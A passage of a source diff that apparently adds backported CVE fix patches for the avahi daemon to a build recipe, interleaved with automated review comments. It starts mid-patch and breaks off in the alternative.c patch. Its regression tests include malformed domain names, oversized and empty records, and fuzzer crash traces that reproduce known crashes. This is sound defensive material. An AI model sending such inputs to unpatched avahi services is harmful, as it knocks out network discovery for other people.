+Subject: [PATCH] Avoid infinite-loop in avahi-daemon by handling HUP event in
+ client_work
+
+If a client fills the input buffer, client_work() disables the
+AVAHI_WATCH_IN event, thus preventing the function from executing the
+`read` syscall the next times it is called. However, if the client then
+terminates the connection, the socket file descriptor receives a HUP
+event, which is not handled, thus the kernel keeps marking the HUP event
+as occurring. While iterating over the file descriptors that triggered
+an event, the client file descriptor will keep having the HUP event and
+the client_work() function is always called with AVAHI_WATCH_HUP but
+without nothing being done, thus entering an infinite loop.
+
+See https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=984938
+
+Upstream-Status: Backport
+CVE: CVE-2021-3468
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ avahi-daemon/simple-protocol.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/avahi-daemon/simple-protocol.c b/avahi-daemon/simple-protocol.c
+index 3e0ebb11..6c0274d6 100644
+--- a/avahi-daemon/simple-protocol.c
++++ b/avahi-daemon/simple-protocol.c
+@@ -424,6 +424,11 @@ static void client_work(AvahiWatch *watch, AVAHI_GCC_UNUSED int fd, AvahiWatchEv
+ }
+ }
+
++ if (events & AVAHI_WATCH_HUP) {
++ client_free(c);
++ return;
++ }
++
+ c->server->poll_api->watch_update(
+ watch,
+ (c->outbuf_length > 0 ? AVAHI_WATCH_OUT : 0) |
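Review bot: The patch header has a bare `Upstream-Status: Backport` with no reference, unlike the other avahi CVE patches added in this commit, which cite the upstream commit they were taken from. Recording the source makes the backport auditable against upstream: `Upstream-Status: Backport [https://github.com/lathiat/avahi/commit/447affe29991ee99c6b9732fc5f2c1048a611d3b]`, assuming the hash in the `From` line is the upstream commit.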
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch
new file mode 100644
index 0000000000..1209864402
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch
@@ -0,0 +1,60 @@
+Backport of:
+
+From a2696da2f2c50ac43b6c4903f72290d5c3fa9f6f Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Petr=20Men=C5=A1=C3=ADk?= <pemensik@redhat.com>
+Date: Thu, 17 Nov 2022 01:51:53 +0100
+Subject: [PATCH] Emit error if requested service is not found
+
+It currently just crashes instead of replying with error. Check return
+value and emit error instead of passing NULL pointer to reply.
+
+Fixes #375
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-1981.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/a2696da2f2c50ac43b6c4903f72290d5c3fa9f6f]
+CVE: CVE-2023-1981
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-daemon/dbus-protocol.c | 20 ++++++++++++++------
+ 1 file changed, 14 insertions(+), 6 deletions(-)
+
+--- a/avahi-daemon/dbus-protocol.c
++++ b/avahi-daemon/dbus-protocol.c
+@@ -391,10 +391,14 @@ static DBusHandlerResult msg_server_impl
+ }
+
+ t = avahi_alternative_host_name(n);
+- avahi_dbus_respond_string(c, m, t);
+- avahi_free(t);
+-
+- return DBUS_HANDLER_RESULT_HANDLED;
++ if (t) {
++ avahi_dbus_respond_string(c, m, t);
++ avahi_free(t);
++
++ return DBUS_HANDLER_RESULT_HANDLED;
++ } else {
++ return avahi_dbus_respond_error(c, m, AVAHI_ERR_NOT_FOUND, "Hostname not found");
++ }
+
+ } else if (dbus_message_is_method_call(m, AVAHI_DBUS_INTERFACE_SERVER, "GetAlternativeServiceName")) {
+ char *n, *t;
+@@ -405,10 +409,14 @@ static DBusHandlerResult msg_server_impl
+ }
+
+ t = avahi_alternative_service_name(n);
+- avahi_dbus_respond_string(c, m, t);
+- avahi_free(t);
+-
+- return DBUS_HANDLER_RESULT_HANDLED;
++ if (t) {
++ avahi_dbus_respond_string(c, m, t);
++ avahi_free(t);
++
++ return DBUS_HANDLER_RESULT_HANDLED;
++ } else {
++ return avahi_dbus_respond_error(c, m, AVAHI_ERR_NOT_FOUND, "Service not found");
++ }
+
+ } else if (dbus_message_is_method_call(m, AVAHI_DBUS_INTERFACE_SERVER, "EntryGroupNew")) {
+ Client *client;
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch
new file mode 100644
index 0000000000..12dad9ef6f
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch
@@ -0,0 +1,48 @@
+From a337a1ba7d15853fb56deef1f464529af6e3a1cf Mon Sep 17 00:00:00 2001
+From: Evgeny Vereshchagin <evvers@ya.ru>
+Date: Mon, 23 Oct 2023 20:29:31 +0000
+Subject: [PATCH] core: reject overly long TXT resource records
+
+Closes https://github.com/lathiat/avahi/issues/455
+
+CVE-2023-38469
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38469-1.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/a337a1ba7d15853fb56deef1f464529af6e3a1cf]
+CVE: CVE-2023-38469
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-core/rr.c | 9 ++++++++-
+ 1 file changed, 8 insertions(+), 1 deletion(-)
+
+Index: avahi-0.7/avahi-core/rr.c
+===================================================================
+--- avahi-0.7.orig/avahi-core/rr.c
++++ avahi-0.7/avahi-core/rr.c
+@@ -32,6 +32,7 @@
+ #include <avahi-common/malloc.h>
+ #include <avahi-common/defs.h>
+
++#include "dns.h"
+ #include "rr.h"
+ #include "log.h"
+ #include "util.h"
+@@ -688,11 +689,17 @@ int avahi_record_is_valid(AvahiRecord *r
+ case AVAHI_DNS_TYPE_TXT: {
+
+ AvahiStringList *strlst;
++ size_t used = 0;
+
+- for (strlst = r->data.txt.string_list; strlst; strlst = strlst->next)
++ for (strlst = r->data.txt.string_list; strlst; strlst = strlst->next) {
+ if (strlst->size > 255 || strlst->size <= 0)
+ return 0;
+
++ used += 1+strlst->size;
++ if (used > AVAHI_DNS_RDATA_MAX)
++ return 0;
++ }
++
+ return 1;
+ }
+ }
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch
new file mode 100644
index 0000000000..a62c718ebe
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch
@@ -0,0 +1,65 @@
+From c6cab87df290448a63323c8ca759baa516166237 Mon Sep 17 00:00:00 2001
+From: Evgeny Vereshchagin <evvers@ya.ru>
+Date: Wed, 25 Oct 2023 18:15:42 +0000
+Subject: [PATCH] tests: pass overly long TXT resource records
+
+to make sure they don't crash avahi any more.
+It reproduces https://github.com/lathiat/avahi/issues/455
+
+Canonical notes:
+nickgalanis> removed first hunk since there is no .github dir in this release
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38469-2.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/c6cab87df290448a63323c8ca759baa516166237]
+CVE: CVE-2023-38469
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-client/client-test.c | 14 ++++++++++++++
+ 1 files changed, 14 insertions(+)
+
+Index: avahi-0.7/avahi-client/client-test.c
+===================================================================
+--- avahi-0.7.orig/avahi-client/client-test.c
++++ avahi-0.7/avahi-client/client-test.c
+@@ -22,6 +22,7 @@
+ #endif
+
+ #include <stdio.h>
++#include <string.h>
+ #include <assert.h>
+
+ #include <avahi-client/client.h>
+@@ -33,6 +34,8 @@
+ #include <avahi-common/malloc.h>
+ #include <avahi-common/timeval.h>
+
++#include <avahi-core/dns.h>
++
+ static const AvahiPoll *poll_api = NULL;
+ static AvahiSimplePoll *simple_poll = NULL;
+
+@@ -222,6 +225,9 @@ int main (AVAHI_GCC_UNUSED int argc, AVA
+ uint32_t cookie;
+ struct timeval tv;
+ AvahiAddress a;
++ uint8_t rdata[AVAHI_DNS_RDATA_MAX+1];
++ AvahiStringList *txt = NULL;
++ int r;
+
+ simple_poll = avahi_simple_poll_new();
+ poll_api = avahi_simple_poll_get(simple_poll);
+@@ -258,6 +264,14 @@ int main (AVAHI_GCC_UNUSED int argc, AVA
+ printf("%s\n", avahi_strerror(avahi_entry_group_add_service (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "Lathiat's Site", "_http._tcp", NULL, NULL, 80, "foo=bar", NULL)));
+ printf("add_record: %d\n", avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", 0x01, 0x10, 120, "\5booya", 6));
+
++ memset(rdata, 1, sizeof(rdata));
++ r = avahi_string_list_parse(rdata, sizeof(rdata), &txt);
++ assert(r >= 0);
++ assert(avahi_string_list_serialize(txt, NULL, 0) == sizeof(rdata));
++ error = avahi_entry_group_add_service_strlst(group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", "_qotd._tcp", NULL, NULL, 123, txt);
++ assert(error == AVAHI_ERR_INVALID_RECORD);
++ avahi_string_list_free(txt);
++
+ avahi_entry_group_commit (group);
+
+ domain = avahi_domain_browser_new (avahi, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, NULL, AVAHI_DOMAIN_BROWSER_BROWSE, 0, avahi_domain_browser_callback, (char*) "omghai3u");
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch
new file mode 100644
index 0000000000..82fb1ab40b
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch
@@ -0,0 +1,57 @@
+From 94cb6489114636940ac683515417990b55b5d66c Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Petr=20Men=C5=A1=C3=ADk?= <pemensik@redhat.com>
+Date: Tue, 11 Apr 2023 15:29:59 +0200
+Subject: [PATCH] Ensure each label is at least one byte long
+
+The only allowed exception is single dot, where it should return empty
+string.
+
+Fixes #454.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38470-1.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/94cb6489114636940ac683515417990b55b5d66c]
+CVE: CVE-2023-38470
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-common/domain-test.c | 14 ++++++++++++++
+ avahi-common/domain.c | 2 +-
+ 2 files changed, 15 insertions(+), 1 deletion(-)
+
+Index: avahi-0.7/avahi-common/domain-test.c
+===================================================================
+--- avahi-0.7.orig/avahi-common/domain-test.c
++++ avahi-0.7/avahi-common/domain-test.c
+@@ -45,6 +45,20 @@ int main(AVAHI_GCC_UNUSED int argc, AVAH
+ printf("%s\n", s = avahi_normalize_name_strdup("fo\\\\o\\..f oo."));
+ avahi_free(s);
+
++ printf("%s\n", s = avahi_normalize_name_strdup("."));
++ avahi_free(s);
++
++ s = avahi_normalize_name_strdup(",.=.}.=.?-.}.=.?.?.}.}.?.?.?.z.?.?.}.}."
++ "}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.}.}.}"
++ ".?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.?.zM.?`"
++ "?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}??.}.}.?.?."
++ "?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.?`?.}.}.}."
++ "??.?.zM.?`?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}?"
++ "?.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM."
++ "?`?.}.}.}.?.?.?.r.=.=.?.?`.?.?}.}.}.?.?.?.r.=.?.}.=.?.?."
++ "}.?.?.?.}.=.?.?.}");
++ assert(s == NULL);
++
+ printf("%i\n", avahi_domain_equal("\\065aa bbb\\.\\046cc.cc\\\\.dee.fff.", "Aaa BBB\\.\\.cc.cc\\\\.dee.fff"));
+ printf("%i\n", avahi_domain_equal("A", "a"));
+
+Index: avahi-0.7/avahi-common/domain.c
+===================================================================
+--- avahi-0.7.orig/avahi-common/domain.c
++++ avahi-0.7/avahi-common/domain.c
+@@ -201,7 +201,7 @@ char *avahi_normalize_name(const char *s
+ }
+
+ if (!empty) {
+- if (size < 1)
++ if (size < 2)
+ return NULL;
+
+ *(r++) = '.';
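Review bot: The new bound `if (size < 2)` in the domain.c hunk of avahi_normalize_name is a bare number, with nothing to say why one byte of remaining space is no longer enough. A comment on that line would tie it to the patch subject and keep a later cleanup from changing it back to 1, for example `/* '.' separator plus at least one byte for the label that follows */`, if that is the intent. The added regression test in domain-test.c checks the over-long name only through `assert(s == NULL)`, so it verifies nothing in a build with NDEBUG defined; whether the test is ever built that way is not visible here. The body of avahi_normalize_name starts and ends outside the hunk.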
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch
new file mode 100644
index 0000000000..403ed6fd6a
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch
@@ -0,0 +1,53 @@
+From 20dec84b2480821704258bc908e7b2bd2e883b24 Mon Sep 17 00:00:00 2001
+From: Evgeny Vereshchagin <evvers@ya.ru>
+Date: Tue, 19 Sep 2023 03:21:25 +0000
+Subject: [PATCH] [common] bail out when escaped labels can't fit into ret
+
+Fixes:
+```
+==93410==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f9e76f14c16 at pc 0x00000047208d bp 0x7ffee90a6a00 sp 0x7ffee90a61c8
+READ of size 1110 at 0x7f9e76f14c16 thread T0
+ #0 0x47208c in __interceptor_strlen (out/fuzz-domain+0x47208c) (BuildId: 731b20c1eef22c2104e75a6496a399b10cfc7cba)
+ #1 0x534eb0 in avahi_strdup avahi/avahi-common/malloc.c:167:12
+ #2 0x53862c in avahi_normalize_name_strdup avahi/avahi-common/domain.c:226:12
+```
+and
+```
+fuzz-domain: fuzz/fuzz-domain.c:38: int LLVMFuzzerTestOneInput(const uint8_t *, size_t): Assertion `avahi_domain_equal(s, t)' failed.
+==101571== ERROR: libFuzzer: deadly signal
+ #0 0x501175 in __sanitizer_print_stack_trace (/home/vagrant/avahi/out/fuzz-domain+0x501175) (BuildId: 682bf6400aff9d41b64b6e2cc3ef5ad600216ea8)
+ #1 0x45ad2c in fuzzer::PrintStackTrace() (/home/vagrant/avahi/out/fuzz-domain+0x45ad2c) (BuildId: 682bf6400aff9d41b64b6e2cc3ef5ad600216ea8)
+ #2 0x43fc07 in fuzzer::Fuzzer::CrashCallback() (/home/vagrant/avahi/out/fuzz-domain+0x43fc07) (BuildId: 682bf6400aff9d41b64b6e2cc3ef5ad600216ea8)
+ #3 0x7f1581d7ebaf (/lib64/libc.so.6+0x3dbaf) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #4 0x7f1581dcf883 in __pthread_kill_implementation (/lib64/libc.so.6+0x8e883) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #5 0x7f1581d7eafd in gsignal (/lib64/libc.so.6+0x3dafd) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #6 0x7f1581d6787e in abort (/lib64/libc.so.6+0x2687e) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #7 0x7f1581d6779a in __assert_fail_base.cold (/lib64/libc.so.6+0x2679a) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #8 0x7f1581d77186 in __assert_fail (/lib64/libc.so.6+0x36186) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+ #9 0x5344a4 in LLVMFuzzerTestOneInput /home/vagrant/avahi/fuzz/fuzz-domain.c:38:9
+```
+
+It's a follow-up to 94cb6489114636940ac683515417990b55b5d66c
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38471-2.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/20dec84b2480821704258bc908e7b2bd2e883b24]
+CVE: CVE-2023-38470 #Follow-up patch
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-common/domain.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+Index: avahi-0.7/avahi-common/domain.c
+===================================================================
+--- avahi-0.7.orig/avahi-common/domain.c
++++ avahi-0.7/avahi-common/domain.c
+@@ -210,7 +210,8 @@ char *avahi_normalize_name(const char *s
+ } else
+ empty = 0;
+
+- avahi_escape_label(label, strlen(label), &r, &size);
++ if (!(avahi_escape_label(label, strlen(label), &r, &size)))
++ return NULL;
+ }
+
+ return ret_s;
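Review bot: The Upstream-Status line of this patch cites the Ubuntu path `debian/patches/CVE-2023-38471-2.patch`, the same path cited by the separate CVE-2023-38471-2.patch added later in this commit, while this file is CVE-2023-38470-2.patch and is tagged `CVE: CVE-2023-38470`. That looks like a copy-paste slip; the import reference should presumably name `CVE-2023-38470-2.patch`, so the backport can be traced to the file it was taken from. The upstream commit hash on the following line matches the `From` line, so only the Ubuntu path needs checking. The code change itself, returning NULL when `avahi_escape_label()` fails, sits inside avahi_normalize_name, whose body starts outside the hunk.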
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch
new file mode 100644
index 0000000000..c8d6a66174
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch
@@ -0,0 +1,73 @@
+From 894f085f402e023a98cbb6f5a3d117bd88d93b09 Mon Sep 17 00:00:00 2001
+From: Michal Sekletar <msekleta@redhat.com>
+Date: Mon, 23 Oct 2023 13:38:35 +0200
+Subject: [PATCH] core: extract host name using avahi_unescape_label()
+
+Previously we could create invalid escape sequence when we split the
+string on dot. For example, from valid host name "foo\\.bar" we have
+created invalid name "foo\\" and tried to set that as the host name
+which crashed the daemon.
+
+Fixes #453
+
+CVE-2023-38471
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38471-1.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/894f085f402e023a98cbb6f5a3d117bd88d93b09]
+CVE: CVE-2023-38471
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-core/server.c | 27 +++++++++++++++++++++------
+ 1 file changed, 21 insertions(+), 6 deletions(-)
+
+Index: avahi-0.7/avahi-core/server.c
+===================================================================
+--- avahi-0.7.orig/avahi-core/server.c
++++ avahi-0.7/avahi-core/server.c
+@@ -1253,7 +1253,11 @@ static void update_fqdn(AvahiServer *s)
+ }
+
+ int avahi_server_set_host_name(AvahiServer *s, const char *host_name) {
+- char *hn = NULL;
++ char label_escaped[AVAHI_LABEL_MAX*4+1];
++ char label[AVAHI_LABEL_MAX];
++ char *hn = NULL, *h;
++ size_t len;
++
+ assert(s);
+
+ AVAHI_CHECK_VALIDITY(s, !host_name || avahi_is_valid_host_name(host_name), AVAHI_ERR_INVALID_HOST_NAME);
+@@ -1263,17 +1267,28 @@ int avahi_server_set_host_name(AvahiServ
+ else
+ hn = avahi_normalize_name_strdup(host_name);
+
+- hn[strcspn(hn, ".")] = 0;
++ h = hn;
++ if (!avahi_unescape_label((const char **)&hn, label, sizeof(label))) {
++ avahi_free(h);
++ return AVAHI_ERR_INVALID_HOST_NAME;
++ }
++
++ avahi_free(h);
+
+- if (avahi_domain_equal(s->host_name, hn) && s->state != AVAHI_SERVER_COLLISION) {
+- avahi_free(hn);
++ h = label_escaped;
++ len = sizeof(label_escaped);
++ if (!avahi_escape_label(label, strlen(label), &h, &len))
++ return AVAHI_ERR_INVALID_HOST_NAME;
++
++ if (avahi_domain_equal(s->host_name, label_escaped) && s->state != AVAHI_SERVER_COLLISION)
+ return avahi_server_set_errno(s, AVAHI_ERR_NO_CHANGE);
+- }
+
+ withdraw_host_rrs(s);
+
+ avahi_free(s->host_name);
+- s->host_name = hn;
++ s->host_name = avahi_strdup(label_escaped);
++ if (!s->host_name)
++ return AVAHI_ERR_NO_MEMORY;
+
+ update_fqdn(s);
+
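Review bot: In the last server.c hunk the host records are withdrawn and the old `s->host_name` is freed before `avahi_strdup(label_escaped)` is known to have succeeded, so an allocation failure returns with `s->host_name` set to NULL and the records already gone. Duplicating the label first, and only then withdrawing and swapping, keeps the server on its previous name when the allocation fails. The follow-up CVE-2023-38471-2.patch in this commit changes the return statements but keeps this ordering. This hunk also passes `hn` to `avahi_unescape_label()` without a NULL check, which that follow-up does add. avahi_server_set_host_name continues outside the hunk.

```c
    char *new_name;
    /* … unchanged: unescape, re-escape and the AVAHI_ERR_NO_CHANGE check … */

    /* Allocate before touching server state so a failure leaves it intact. */
    if (!(new_name = avahi_strdup(label_escaped)))
        return avahi_server_set_errno(s, AVAHI_ERR_NO_MEMORY);

    withdraw_host_rrs(s);

    avahi_free(s->host_name);
    s->host_name = new_name;

    update_fqdn(s);
```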
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch
new file mode 100644
index 0000000000..a789b144ed
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch
@@ -0,0 +1,52 @@
+From b675f70739f404342f7f78635d6e2dcd85a13460 Mon Sep 17 00:00:00 2001
+From: Evgeny Vereshchagin <evvers@ya.ru>
+Date: Tue, 24 Oct 2023 22:04:51 +0000
+Subject: [PATCH] core: return errors from avahi_server_set_host_name properly
+
+It's a follow-up to 894f085f402e023a98cbb6f5a3d117bd88d93b09
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38471-2.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/b675f70739f404342f7f78635d6e2dcd85a13460]
+CVE: CVE-2023-38471 #Follow-up Patch
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-core/server.c | 9 ++++++---
+ 1 file changed, 6 insertions(+), 3 deletions(-)
+
+Index: avahi-0.7/avahi-core/server.c
+===================================================================
+--- avahi-0.7.orig/avahi-core/server.c
++++ avahi-0.7/avahi-core/server.c
+@@ -1267,10 +1267,13 @@ int avahi_server_set_host_name(AvahiServ
+ else
+ hn = avahi_normalize_name_strdup(host_name);
+
++ if (!hn)
++ return avahi_server_set_errno(s, AVAHI_ERR_NO_MEMORY);
++
+ h = hn;
+ if (!avahi_unescape_label((const char **)&hn, label, sizeof(label))) {
+ avahi_free(h);
+- return AVAHI_ERR_INVALID_HOST_NAME;
++ return avahi_server_set_errno(s, AVAHI_ERR_INVALID_HOST_NAME);
+ }
+
+ avahi_free(h);
+@@ -1278,7 +1281,7 @@ int avahi_server_set_host_name(AvahiServ
+ h = label_escaped;
+ len = sizeof(label_escaped);
+ if (!avahi_escape_label(label, strlen(label), &h, &len))
+- return AVAHI_ERR_INVALID_HOST_NAME;
++ return avahi_server_set_errno(s, AVAHI_ERR_INVALID_HOST_NAME);
+
+ if (avahi_domain_equal(s->host_name, label_escaped) && s->state != AVAHI_SERVER_COLLISION)
+ return avahi_server_set_errno(s, AVAHI_ERR_NO_CHANGE);
+@@ -1288,7 +1291,7 @@ int avahi_server_set_host_name(AvahiServ
+ avahi_free(s->host_name);
+ s->host_name = avahi_strdup(label_escaped);
+ if (!s->host_name)
+- return AVAHI_ERR_NO_MEMORY;
++ return avahi_server_set_errno(s, AVAHI_ERR_NO_MEMORY);
+
+ update_fqdn(s);
+
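Review bot: The added `if (!hn)` check reports AVAHI_ERR_NO_MEMORY for every NULL from `avahi_normalize_name_strdup()`, but the CVE-2023-38470 patches in this same commit make the normalizer return NULL for names it cannot fit or escape, not only on allocation failure. The AVAHI_CHECK_VALIDITY call earlier in the function may already exclude such names, though that cannot be confirmed from the hunk. A comment such as `/* NULL here means allocation failure; invalid names were rejected above */` would state the assumption, or the error could be mapped to AVAHI_ERR_INVALID_HOST_NAME if it does not hold. avahi_server_set_host_name starts and ends outside the hunks.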
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch
new file mode 100644
index 0000000000..f49d990a42
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch
@@ -0,0 +1,45 @@
+From b024ae5749f4aeba03478e6391687c3c9c8dee40 Mon Sep 17 00:00:00 2001
+From: Michal Sekletar <msekleta@redhat.com>
+Date: Thu, 19 Oct 2023 17:36:44 +0200
+Subject: [PATCH] core: make sure there is rdata to process before parsing it
+
+Fixes #452
+
+CVE-2023-38472
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38472.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/b024ae5749f4aeba03478e6391687c3c9c8dee40]
+CVE: CVE-2023-38472
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-client/client-test.c | 3 +++
+ avahi-daemon/dbus-entry-group.c | 2 +-
+ 2 files changed, 4 insertions(+), 1 deletion(-)
+
+Index: avahi-0.7/avahi-client/client-test.c
+===================================================================
+--- avahi-0.7.orig/avahi-client/client-test.c
++++ avahi-0.7/avahi-client/client-test.c
+@@ -272,6 +272,9 @@ int main (AVAHI_GCC_UNUSED int argc, AVA
+ assert(error == AVAHI_ERR_INVALID_RECORD);
+ avahi_string_list_free(txt);
+
++ error = avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", 0x01, 0x10, 120, "", 0);
++ assert(error != AVAHI_OK);
++
+ avahi_entry_group_commit (group);
+
+ domain = avahi_domain_browser_new (avahi, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, NULL, AVAHI_DOMAIN_BROWSER_BROWSE, 0, avahi_domain_browser_callback, (char*) "omghai3u");
+Index: avahi-0.7/avahi-daemon/dbus-entry-group.c
+===================================================================
+--- avahi-0.7.orig/avahi-daemon/dbus-entry-group.c
++++ avahi-0.7/avahi-daemon/dbus-entry-group.c
+@@ -340,7 +340,7 @@ DBusHandlerResult avahi_dbus_msg_entry_g
+ if (!(r = avahi_record_new_full (name, clazz, type, ttl)))
+ return avahi_dbus_respond_error(c, m, AVAHI_ERR_NO_MEMORY, NULL);
+
+- if (avahi_rdata_parse (r, rdata, size) < 0) {
++ if (!rdata || avahi_rdata_parse (r, rdata, size) < 0) {
+ avahi_record_unref (r);
+ return avahi_dbus_respond_error(c, m, AVAHI_ERR_INVALID_RDATA, NULL);
+ }
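Review bot: The `!rdata` guard added in the dbus-entry-group.c hunk has no comment saying when `rdata` can be NULL. The new client test passes `"", 0`, which suggests an empty byte array arrives as a NULL pointer, but the code that fills `rdata` is outside the hunk. A one-line comment above the check, for example `/* empty rdata array: nothing to parse, reject it */`, would record why the pointer is tested before `avahi_rdata_parse()`. The new test also asserts only `error != AVAHI_OK`, whereas the check just before it pins the exact code, so it would still pass if the request failed for an unrelated reason. Asserting the specific error the client receives would make it a tighter regression test.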
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch
new file mode 100644
index 0000000000..59f6806c85
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch
@@ -0,0 +1,109 @@
+From b448c9f771bada14ae8de175695a9729f8646797 Mon Sep 17 00:00:00 2001
+From: Michal Sekletar <msekleta@redhat.com>
+Date: Wed, 11 Oct 2023 17:45:44 +0200
+Subject: [PATCH] common: derive alternative host name from its unescaped
+ version
+
+Normalization of input makes sure we don't have to deal with special
+cases like unescaped dot at the end of label.
+
+Fixes #451 #487
+CVE-2023-38473
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38473.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/b448c9f771bada14ae8de175695a9729f8646797]
+CVE: CVE-2023-38473
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-common/alternative-test.c | 3 +++
+ avahi-common/alternative.c | 27 +++++++++++++++++++--------
+ 2 files changed, 22 insertions(+), 8 deletions(-)
+
+Index: avahi-0.7/avahi-common/alternative-test.c
+===================================================================
+--- avahi-0.7.orig/avahi-common/alternative-test.c
++++ avahi-0.7/avahi-common/alternative-test.c
+@@ -31,6 +31,9 @@ int main(AVAHI_GCC_UNUSED int argc, AVAH
+ const char* const test_strings[] = {
+ "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
+ "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXüüüüüüü",
++ ").",
++ "\\.",
++ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\\\",
+ "gurke",
+ "-",
+ " #",
+Index: avahi-0.7/avahi-common/alternative.c
+===================================================================
+--- avahi-0.7.orig/avahi-common/alternative.c
